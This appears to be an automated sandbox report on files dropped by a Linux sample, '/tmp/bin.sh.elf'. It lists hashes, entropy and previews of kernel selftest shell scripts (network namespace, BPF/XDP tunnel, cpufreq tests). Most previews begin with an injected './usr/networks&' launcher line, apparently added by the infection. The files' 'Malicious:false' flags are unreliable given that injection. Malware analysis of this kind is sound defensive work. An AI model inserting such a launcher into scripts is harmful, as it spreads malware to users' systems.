                                                                        Preview:./usr/networks&..exit 1.fi..# check that nc, dd, and timeout are present.command -v nc >/dev/null 2>&1 || \..{ echo >&2 "nc is not available"; exit 1; }.command -v dd >/dev/null 2>&1 || \..{ echo >&2 "nc is not available"; exit 1; }.command -v timeout >/dev/null 2>&1 || \..{ echo >&2 "timeout is not available"; exit 1; }..readonly NS_SRC="ns-src-$(mktemp -u XXXXXX)".readonly NS_DST="ns-dst-$(mktemp -u XXXXXX)"..readonly IP_SRC="172.16.1.100".readonly IP_DST="172.16.2.100"..cleanup().{..ip netns del ${NS_SRC}..ip netns del ${NS_DST}.}..trap cleanup EXIT..set -e # exit on error..ip netns add "${NS_SRC}".ip netns add "${NS_DST}".ip link add veth_src type veth peer name veth_dst.ip link set veth_src netns ${NS_SRC}.ip link set veth_dst netns ${NS_DST}..ip -netns ${NS_SRC} addr add ${IP_SRC}/24 dev veth_src.ip -netns ${NS_DST} addr add ${IP_DST}/24 dev veth_dst..ip -netns ${NS_SRC} link set dev veth_src up.ip -netns ${NS_DST} link set dev veth_dst up..ip -netns ${NS_SRC} route add ${IP_D
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):5339
                                                                        Entropy (8bit):5.0017094276510194
                                                                        Encrypted:false
                                                                        SSDEEP:96:VNvN4NzN8QxGMuQIHov8MJBeWzS2Dna5Z+kv6jyrm46:bqPVTpu2EFcB
                                                                        MD5:7D056F227B2C6686912434BD207F49A9
                                                                        SHA1:B548FD6A982296E69B285B72674229EAAE224C6E
                                                                        SHA-256:64E38DDDC941634D982632417F5DF6194B3FA4801C4A835CC38BC268A5C20FFD
                                                                        SHA-512:D4865E9EF38F9C76AEEF424521E8056B5C507CD4B95B83182A9C6F09F1AD6A859D5927B34820B84B71E5C823C1720309119BF3D35914199647713B22D398AF10
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..fi.}..set -e..# no arguments: automated test, run all.if [[ "$#" -eq "0" ]]; then..echo "ipip"..$0 ipv4 ipip none 100...echo "ip6ip6"..$0 ipv6 ip6tnl none 100...echo "sit"..$0 ipv6 sit none 100...for mac in none mpls eth ; do...echo "ip gre $mac"...$0 ipv4 gre $mac 100....echo "ip6 gre $mac"...$0 ipv6 ip6gre $mac 100....echo "ip gre $mac gso"...$0 ipv4 gre $mac 2000....echo "ip6 gre $mac gso"...$0 ipv6 ip6gre $mac 2000....echo "ip udp $mac"...$0 ipv4 udp $mac 100....echo "ip6 udp $mac"...$0 ipv6 ip6udp $mac 100....echo "ip udp $mac gso"...$0 ipv4 udp $mac 2000....echo "ip6 udp $mac gso"...$0 ipv6 ip6udp $mac 2000..done...echo "OK. All tests passed"..exit 0.fi..if [[ "$#" -ne "4" ]]; then..echo "Usage: $0"..echo " or: $0 <ipv4|ipv6> <tuntype> <none|mpls|eth> <data_len>"..exit 1.fi..case "$1" in."ipv4")..readonly addr1="${ns1_v4}"..readonly addr2="${ns2_v4}"..readonly ipproto=4..readonly netcat_opt=-${ipproto}..readonly foumod=fou..readonly foutype=ipip..reado
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:C source, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1353
                                                                        Entropy (8bit):5.4396025488101865
                                                                        Encrypted:false
                                                                        SSDEEP:24:Ha7/uT8HyHhKF4mA5I49I4SJHK4M4SdXBBbs4txX/Rp9FQb1:ECmfxdJq4Mdd4y4h
                                                                        MD5:2DAFC47BEFAB85E3AA67C94BB37209D4
                                                                        SHA1:DE81DD3C51199D946742ACBD45F51F702EB2B841
                                                                        SHA-256:CAEBE8046B018B5B70A7A1BF914076882A5B50B1F92ED142A483255431F992FF
                                                                        SHA-512:1E97B52366221DA2310A39E16B0010F874091E5D90C3D55221C8B6B5CE5DA5EC32B51F24A943CA185BBB961CB1CDBDAFE736AF34D99FF7707CCFDE9CE99BD817
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.}..get_prog_id().{..awk '/ id / {sub(/.* id /, "", $0); print($1)}'.}..ns1_exec().{..ip netns exec ns1 "$@".}..setup().{..ip netns add ns1..ns1_exec ip link set lo up...ns1_exec sysctl -w net.ipv4.tcp_syncookies=2..ns1_exec sysctl -w net.ipv4.tcp_window_scaling=0..ns1_exec sysctl -w net.ipv4.tcp_timestamps=0..ns1_exec sysctl -w net.ipv4.tcp_sack=0...wait_for_ip 127.0.0.1..wait_for_ip ::1.}..cleanup().{..ip netns del ns1 2>/dev/null || :.}..main().{..trap cleanup EXIT 2 3 6 15..setup...printf "Testing clsact..."..ns1_exec tc qdisc add dev "${TEST_IF}" clsact..ns1_exec tc filter add dev "${TEST_IF}" ingress \...bpf obj "${BPF_PROG_OBJ}" sec "${CLSACT_SECTION}" da...BPF_PROG_ID=$(ns1_exec tc filter show dev "${TEST_IF}" ingress | \... get_prog_id)..ns1_exec "${PROG}" "${BPF_PROG_ID}"..ns1_exec tc qdisc del dev "${TEST_IF}" clsact...printf "Testing XDP..."..ns1_exec ip link set "${TEST_IF}" xdp \...object "${BPF_PROG_OBJ}" section "${XDP_SECTION}"..BPF_PROG_ID=
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1912
                                                                        Entropy (8bit):5.207312592924516
                                                                        Encrypted:false
                                                                        SSDEEP:24:Yq3bFI7wapJJVcYJJVwYJ5YJSBYJJVPERkm9qQrBrdB/hthTlQirzR3h3h1KkxJ0:5apJJVHJJVDJ2JSOJJVPekmkkqP
                                                                        MD5:CB6386382686DC790D4B284A63DD8B25
                                                                        SHA1:B2602353A56E69BE26A9963A6D53CA4FE8A6A339
                                                                        SHA-256:F44683183AE55B02B07982FBD765DCC6EBB40EB3C1DF2AE70A47DFE75416A073
                                                                        SHA-512:AB990DB5698E05B3CC2E79078005C8F7B44D2F2D5374A951ECB1E20326E72FCE98E3B25EC37EA8C7AD0B4C82498F6173A445BB86F5CF8EA685E379910BC6F224
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.cleanup_exit().{..echo "CATCH SIGKILL or SIGINT, cleanup and exit"..cleanup..exit 0.}..check().{..ip link help 2>&1 | grep -q "\s$1\s"..if [ $? -ne 0 ];then...echo "SKIP $1: iproute2 not support"..cleanup..return 1..fi.}..enable_debug().{..echo 'file ip_gre.c +p' > /sys/kernel/debug/dynamic_debug/control..echo 'file ip6_gre.c +p' > /sys/kernel/debug/dynamic_debug/control..echo 'file vxlan.c +p' > /sys/kernel/debug/dynamic_debug/control..echo 'file geneve.c +p' > /sys/kernel/debug/dynamic_debug/control..echo 'file ipip.c +p' > /sys/kernel/debug/dynamic_debug/control.}..check_err().{..if [ $ret -eq 0 ]; then...ret=$1..fi.}..bpf_tunnel_test().{..local errors=0...echo "Testing GRE tunnel..."..test_gre..errors=$(( $errors + $? ))...echo "Testing IP6GRE tunnel..."..test_ip6gre..errors=$(( $errors + $? ))...echo "Testing IP6GRETAP tunnel..."..test_ip6gretap..errors=$(( $errors + $? ))...echo "Testing ERSPAN tunnel..."..test_erspan v2..errors=$(( $errors + $? ))...echo "Testing
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):902
                                                                        Entropy (8bit):4.342773839740934
                                                                        Encrypted:false
                                                                        SSDEEP:12:xqgzdQEeMHrFzBZSvuNJ/Ez7Mv96zgyirwNVrwFQUAvQ5Dm2Qe7Qs8RBe8K4n:oEJVKU5q1bhNqOUF5Dae8/Yb4
                                                                        MD5:AEB56524F126B615817DE51165E003B4
                                                                        SHA1:ECDE1434B22AFDB0E893A8EE52C03F02D07FC016
                                                                        SHA-256:80B96271B9151951A445595FB8659CB0F67F1664D6F1E0EA6B516EB232A8F32F
                                                                        SHA-512:55A3DC79B34150506C49E3C93C48919ED18FDEBA27966F5F115B089A4DA25B55D7A93B6D1ADF119A23159424F116DAA227918DC8699D44D7EA09C5C4F22A12D5
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 0.fi.set -e..ip netns add ns1.ip netns add ns2..trap cleanup 0 2 3 6 9..ip link add veth1 type veth peer name veth2..ip link set veth1 netns ns1.ip link set veth2 netns ns2..ip netns exec ns1 ip addr add 10.1.1.11/24 dev veth1.ip netns exec ns2 ip addr add 10.1.1.22/24 dev veth2..ip netns exec ns1 tc qdisc add dev veth1 clsact.ip netns exec ns2 tc qdisc add dev veth2 clsact..ip netns exec ns1 tc filter add dev veth1 ingress bpf da obj test_xdp_meta.o sec t.ip netns exec ns2 tc filter add dev veth2 ingress bpf da obj test_xdp_meta.o sec t..ip netns exec ns1 ip link set dev veth1 xdp obj test_xdp_meta.o sec x.ip netns exec ns2 ip link set dev veth2 xdp obj test_xdp_meta.o sec x..ip netns exec ns1 ip link set dev veth1 up.ip netns exec ns2 ip link set dev veth2 up..ip netns exec ns1 ping -c 1 10.1.1.22.ip netns exec ns2 ping -c 1 10.1.1.11..exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):767
                                                                        Entropy (8bit):4.374876194795111
                                                                        Encrypted:false
                                                                        SSDEEP:12:xqgzdQEeTrFVrFrJZrWZoJOW84q3fQoc7QwMRMZQLP4OQ5EBe8K4n:oEOzNFdoooc8P1LPo5EYb4
                                                                        MD5:3FBEA0F5A3A44C38DE78FA04A8F20F4C
                                                                        SHA1:DF6CAEBDC0B41681A8D9F6EB93A57170E491CF0F
                                                                        SHA-256:4F9AF779F4D8072518504184058911B20A557043C48EC5A305AEF58A298ABDE5
                                                                        SHA-512:F7F4EF184A07ADAF93216546B6172835E3E67DE788B3330C1F6B3E3CB2840CFD41EB226267FC4EE6A0FBD872FE1B43439770F156417DC42220B54B3295FA5293
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 0.fi.set -e..ip netns add ns1.ip netns add ns2..trap cleanup 0 2 3 6 9..ip link add veth1 index 111 type veth peer name veth11.ip link add veth2 index 222 type veth peer name veth22..ip link set veth11 netns ns1.ip link set veth22 netns ns2..ip link set veth1 up.ip link set veth2 up..ip netns exec ns1 ip addr add 10.1.1.11/24 dev veth11.ip netns exec ns2 ip addr add 10.1.1.22/24 dev veth22..ip netns exec ns1 ip link set dev veth11 up.ip netns exec ns2 ip link set dev veth22 up..ip link set dev veth1 xdpgeneric obj test_xdp_redirect.o sec redirect_to_222.ip link set dev veth2 xdpgeneric obj test_xdp_redirect.o sec redirect_to_111..ip netns exec ns1 ping -c 1 10.1.1.22.ip netns exec ns2 ping -c 1 10.1.1.11..exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2423
                                                                        Entropy (8bit):5.128034697458766
                                                                        Encrypted:false
                                                                        SSDEEP:48:KNfi7s/PHSdG16qZuH8Pa5yOU4I3dfa6E7vc45SWs:K5ZydWoH8P6pwfvE7vccSWs
                                                                        MD5:1B96D7C2944C0FE933D088AEA9AD7E46
                                                                        SHA1:ACB6C2FE43224F93E4C4624D2E12D7C8408D2055
                                                                        SHA-256:7A429BC65F7DD3FFF35DC43515956C5800AB1225F8A57B114563EEB7DA391EFE
                                                                        SHA-512:40EEAE893DDAB845EB650662E4BF29BB7946881CEEB08A9ABA126B44ABE6590D2355593948F99E938B838F896E0801278563241DA15909FF48352BCAFBDBE608
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.BPF_FS=$(awk '$3 == "bpf" {print $2; exit}' /proc/mounts).BPF_DIR=$BPF_FS/test_$TESTNAME.._cleanup().{..set +e..ip link del veth1 2> /dev/null..ip link del veth2 2> /dev/null..ip link del veth3 2> /dev/null..ip netns del ns1 2> /dev/null..ip netns del ns2 2> /dev/null..ip netns del ns3 2> /dev/null..rm -rf $BPF_DIR 2> /dev/null.}..cleanup_skip().{..echo "selftests: $TESTNAME [SKIP]".._cleanup...exit $ksft_skip.}..cleanup().{..if [ "$?" = 0 ]; then...echo "selftests: $TESTNAME [PASS]"..else...echo "selftests: $TESTNAME [FAILED]"..fi.._cleanup.}..if [ $(id -u) -ne 0 ]; then..echo "selftests: $TESTNAME [SKIP] Need root privileges"..exit $ksft_skip.fi..if ! ip link set dev lo xdp off > /dev/null 2>&1; then..echo "selftests: $TESTNAME [SKIP] Could not run test without the ip xdp support"..exit $ksft_skip.fi..if [ -z "$BPF_FS" ]; then..echo "selftests: $TESTNAME [SKIP] Could not run test without bpffs mounted"..exit $ksft_skip.fi..if ! bpftool version > /dev/null 2>&1; then..
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):4755
                                                                        Entropy (8bit):5.148825786731255
                                                                        Encrypted:false
                                                                        SSDEEP:96:zOaoILqMju/udWB40aU10oi8JWAiWRRCQP+SR0XcyM5c72lCSgy4Y7:zTLLqMKd4tUqoi8NmHNslCNNY7
                                                                        MD5:C179F5E1062459B06C0F899FEFDB2B3B
                                                                        SHA1:6832CAFFD1D52F776101A94E5A5CC4DBC95D4AFC
                                                                        SHA-256:E81E5F5A8C27722A58E154B9493D3F26B954E81C46EC14AD106DEE90A5F42962
                                                                        SHA-512:4EDF18741DCB3763602A90980C024DFA6044864AE2BA64742F6F8C4EF8AE39334BFDBE99E6296EDF7EFACFEAADA5F86B499A1FAC9C8C847738F19C908524CFC4
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit $status..fi...set +e..ip link del veth1 2> /dev/null..ip netns del ns1 2> /dev/null..ip netns del ns2 2> /dev/null.}..# Using external program "getopt" to get --long-options.OPTIONS=$(getopt -o hvfi: \. --long verbose,flush,help,interactive,debug,mode: -- "$@").if (( $? != 0 )); then. usage. echo "selftests: $TESTNAME [FAILED] Error calling getopt, unknown option?". exit 2.fi.eval set -- "$OPTIONS"..## --- Parse command line arguments / parameters ---.while true; do..case "$1" in.. -v | --verbose)...export VERBOSE=yes...shift...;;.. -i | --interactive | --debug )...INTERACTIVE=yes...shift...;;.. -f | --flush )...cleanup...shift...;;.. --mode )...shift...XDP_MODE=$1...shift...;;.. -- )...shift...break...;;.. -h | --help )...usage;...echo "selftests: $TESTNAME [SKIP] usage help info requested"...exit 0...;;.. * )...shift...break...;;..esac.done..if [ "$EUID" -ne 0 ]; then..echo "selftests: $TESTNAME [FAILED] need root privileges"..
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):46
                                                                        Entropy (8bit):3.925523369006428
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):995
                                                                        Entropy (8bit):4.928718603247161
                                                                        Encrypted:false
                                                                        SSDEEP:24:aPLPH+uFgWHLTEoozooHFFMF8kL2nfkvUdyXwRx7:aPLPeKgqH3oMoMF8kL2MvUT
                                                                        MD5:973C7E7EF2911945AA49402DCFBB1627
                                                                        SHA1:DE36D342A11EFF124B62EF56DE2728672F473562
                                                                        SHA-256:3B0F9186CC564F480FAAE9E0D192EA887FDFAC05C6036CC776CB0F730D66D381
                                                                        SHA-512:AE92957D9E517ACF95DF2F4878A7F8F07ACB9EFB6E7647F9B7D08F68CE895BE0B34424BA16C2F96D5AC04D64D4C133285D00E501171ECFA5082D8B97177E13E0
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 1.}..setup() {. ip -6 addr add "${V6_INNER}" dev lo || fail 'failed to setup v6 address'. ip -4 addr add "${V4_INNER}" dev lo || fail 'failed to setup v4 address'.. if [[ -n "${V6_SIT}" ]]; then. ip link add "${SIT_DEV_NAME}" type sit remote any local any \.. || fail 'failed to add sit'. ip link set dev "${SIT_DEV_NAME}" up \.. || fail 'failed to bring sit device up'. ip -6 addr add "${V6_SIT}" dev "${SIT_DEV_NAME}" \.. || fail 'failed to setup v6 SIT address'. ip -4 addr add "${V4_SIT}" dev "${SIT_DEV_NAME}" \.. || fail 'failed to setup v4 SIT address'. fi.. sleep 2.# avoid race causing bind to fail.}..cleanup() {. if [[ -n "${V6_SIT}" ]]; then. ip -4 addr del "${V4_SIT}" dev "${SIT_DEV_NAME}". ip -6 addr del "${V6_SIT}" dev "${SIT_DEV_NAME}". ip link del "${SIT_DEV_NAME}". fi.. ip -4 addr del "${V4_INNER}" dev lo. ip -6 addr del "${V6_INNER}" dev lo.}..trap cleanup EXIT..setup."$@".exit "$?"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):49
                                                                        Entropy (8bit):4.073694027700372
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORjusVOORgn:Hn
                                                                        MD5:8BB6EDFFB7B315BB004E723523112C7C
                                                                        SHA1:28AE6BC189D31C09263C661FE1F657ACC53FA62F
                                                                        SHA-256:83D6A5A6B4BA19B9F6783B95D420A9B62DF61A7AC1D1725C0C580422C30BE4F5
                                                                        SHA-512:6A410CF23E3B40168C11641FC28440F23A966EB0069A737806885A7E1AB152A3D75CA34EB06E347926EB504842AB28E500AAC0429D3CBFCC9E1785CCF5C8E5AD
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit "$?"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):5594
                                                                        Entropy (8bit):5.230978388733242
                                                                        Encrypted:false
                                                                        SSDEEP:96:oaS6S51Xx4JG/0gEvJ0C22I5B7TyFn/cH:5SrIG9EvwJ7TyFn/cH
                                                                        MD5:472C1D8107D68470FAEE126A96AEF61B
                                                                        SHA1:16CED932ABCE5F22426C12309CB1D2610916B167
                                                                        SHA-256:0910E28F5BF31A72930DA1F147C0A4343ECE41564566C42A5BCB0C76DA503D67
                                                                        SHA-512:CE71ECFAA8194C16FB55B42DECCBD22D53FB5C675E7CCDAE3FE8A6348440C7FE94EE8458AAA8EC7C49D4C95D907B50C0338AC21C6EAA337DA3D6B3F1CA003FD5
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit $ksft_skip..fi...taskset -p 01 $$...SYSFS=`mount -t sysfs | head -1 | awk '{ print $3 }'`...if [ ! -d "$SYSFS" ]; then...echo $msg sysfs is not mounted >&2...exit $ksft_skip..fi...if ! ls $SYSFS/devices/system/cpu/cpu* > /dev/null 2>&1; then...echo $msg cpu hotplug is not supported >&2...exit $ksft_skip..fi...echo "CPU online/offline summary:"..online_cpus=`cat $SYSFS/devices/system/cpu/online`..online_max=${online_cpus##*-}...if [[ "$online_cpus" = "$online_max" ]]; then...echo "$msg: since there is only one cpu: $online_cpus"...exit $ksft_skip..fi...present_cpus=`cat $SYSFS/devices/system/cpu/present`..present_max=${present_cpus##*-}..echo "present_cpus = $present_cpus present_max = $present_max"...echo -e "\t Cpus in online state: $online_cpus"...offline_cpus=`cat $SYSFS/devices/system/cpu/offline`..if [[ "a$offline_cpus" = "a" ]]; then...offline_cpus=0..else...offline_max=${offline_cpus##*-}..fi..echo -e "\t Cpus in offline state: $offline_cpus".}..#.# list a
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1369
                                                                        Entropy (8bit):5.048807352649125
                                                                        Encrypted:false
                                                                        SSDEEP:24:AK62FivFFEh1fmiJTimcQQlUscucGExj8raZgcUP5AgQYSWoNUvaGx:d62F8FEnDUqAvE5cRR9do9+
                                                                        MD5:C5A7D35188A9AAF25BEDDA4AEE995EF0
                                                                        SHA1:44AE09FB5696C05961433BC5621D3E4A8BC97B97
                                                                        SHA-256:15C184F5864838DE83D8876AF2F0852C035CF07B49E350B09A0D2E8D54EF3FB4
                                                                        SHA-512:7F329A62D59CB53663D73C72CCE33FD1E8608F5E59A5FA7D55103192D0E14029958378C2FF9A62B38E2A0B254CF3F9F2B9A1321A0B9912F4FC28B83DB4D0A832
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...printf "No cpu is managed by cpufreq core, exiting\n"...exit;..else...printf "CPUFreq manages: $count CPUs\n\n"..fi...# Detect & print which CPUs are not managed by cpufreq..print_unmanaged_cpus...# read/update all cpufreq files..read_all_cpufreq_files..update_all_cpufreq_files...# hotplug cpus..reboot_cpus 5...# Test all frequencies..shuffle_frequency_for_all_cpus 2...# Test all governors..shuffle_governors_for_all_cpus 1.}..# Suspend/resume.# $1: "suspend" or "hibernate", $2: loop count.do_suspend().{..printf "** Test: Running ${FUNCNAME[0]}: Trying $1 for $2 loops **\n\n"...# Is the directory available..if [ ! -d $SYSFS/power/ -o ! -f $SYSFS/power/state ]; then...printf "$SYSFS/power/state not available\n"...return 1..fi...if [ $1 = "suspend" ]; then...filename="mem"..elif [ $1 = "hibernate" ]; then...filename="disk"..else...printf "$1 is not a valid option\n"...return 1..fi...if [ -n $filename ]; then...present=$(cat $SYSFS/power/state | grep $filename)....if [ -z
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2675
                                                                        Entropy (8bit):5.301400756767313
                                                                        Encrypted:false
                                                                        SSDEEP:48:iaeuwSaSSnAxaL0nvr1dvQNrFsizYhvrCVSD0tlpPjrtyMC1ddctY2zYYA4Vu:FaS6/CcFX0hWHt7fty1pQAGu
                                                                        MD5:BC1F61E4F846CFD9A04893ACCB5CFFA2
                                                                        SHA1:8666AB5AC8731768B4624402D642A9C3DC9D7164
                                                                        SHA-256:230017DA8F33AC1553156CDA07EF1606DB6486FE975E09440E739B7190103ABE
                                                                        SHA-512:FE022DE2F141DAF8F6F52B2EB9F680D0AAAD98A535B0A6F03FACE81A8D9CA027B750E82BCF4C83ADE7848AD4D3B6B915BAEA789D13C39C0BCDFA6F54B0F9ECB2
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 2.}..prerequisite().{..msg="skip all tests:"...if [ $UID != 0 ]; then...echo $msg must be run as root >&2...exit $ksft_skip..fi...taskset -p 01 $$...SYSFS=`mount -t sysfs | head -1 | awk '{ print $3 }'`...if [ ! -d "$SYSFS" ]; then...echo $msg sysfs is not mounted >&2...exit 2..fi...CPUROOT=$SYSFS/devices/system/cpu..CPUFREQROOT="$CPUROOT/cpufreq"...if ! ls $CPUROOT/cpu* > /dev/null 2>&1; then...echo $msg cpus not available in sysfs >&2...exit 2..fi...if ! ls $CPUROOT/cpufreq > /dev/null 2>&1; then...echo $msg cpufreq directory not available in sysfs >&2...exit 2..fi.}..parse_arguments().{..while getopts ht:o:d:g: arg..do...case $arg in....h) # --help.....helpme.....;;.....t) # --func_type (Function to perform: basic, suspend, hibernate, modtest, sptest1/2/3/4 (default: basic)).....FUNC=$OPTARG.....;;.....o) # --output-file (Output file to store dumps).....OUTFILE=$OPTARG.....;;.....d) # --driver-mod-name (Name of the driver module).....DRIVER_MOD=$OPTARG.....;;..
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):4514
                                                                        Entropy (8bit):5.01683672738103
                                                                        Encrypted:false
                                                                        SSDEEP:96:7/VtUWyeZ2qB/Htbuk01FyySFGFilK3NO84rWB/H/U41QekubaVUwWSQH17HE:7//uUHlbu1Pyy2GuK9pxXLQTBSBk
                                                                        MD5:91082C2DCE660B751AF54F31756B587B
                                                                        SHA1:0DF12E3E0017F6881BA78DF8114647B7BF587E2B
                                                                        SHA-256:AB9A80ACB0658F4B232FF4526B865A02283827D07A29C6BFF005454E8688E11B
                                                                        SHA-512:ED999C1E074AB50964AE86B8FB554D63D5CD65BC9CB90966DA64E9ABBA62AAA412E0F5439F852FFAB195EB7CFC080B252C6FD0AE966D8CC593400237758EFF1F
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit;..fi...printf "Removing $1 module\n"..# remove module..rmmod $1..if [ $? != 0 ]; then...printf "rmmod $1 failed\n"...exit;..fi...printf "\n".}..# Insert cpufreq driver module and perform basic tests.# $1: cpufreq-driver module to insert.# $2: If we want to play with CPUs (1) or not (0).module_driver_test_single().{..printf "** Test: Running ${FUNCNAME[0]} for driver $1 and cpus_hotplug=$2 **\n\n"...if [ $2 -eq 1 ]; then...# offline all non-boot CPUs...for_each_non_boot_cpu offline_cpu...printf "\n"..fi...# insert module..printf "Inserting $1 module\n\n"..insmod $1..if [ $? != 0 ]; then...printf "Insmod $1 failed\n"...return;..fi...if [ $2 -eq 1 ]; then...# online all non-boot CPUs...for_each_non_boot_cpu online_cpu...printf "\n"..fi...# run basic tests..cpufreq_basic_tests...# remove module..printf "Removing $1 module\n\n"..rmmod $1..if [ $? != 0 ]; then...printf "rmmod $1 failed\n"...return;..fi...# There shouldn't be any cpufreq directories now...for_each_cpu c
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):237
                                                                        Entropy (8bit):4.471399431089706
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVx7jSHvK3rKCAWRMeFrALlr3rKbVR9MdZe6TykXVwOHYlve6TykXVEQP/NJjUE:a7u26eFUQVHMPHXSOivHXmQPTov6viMn
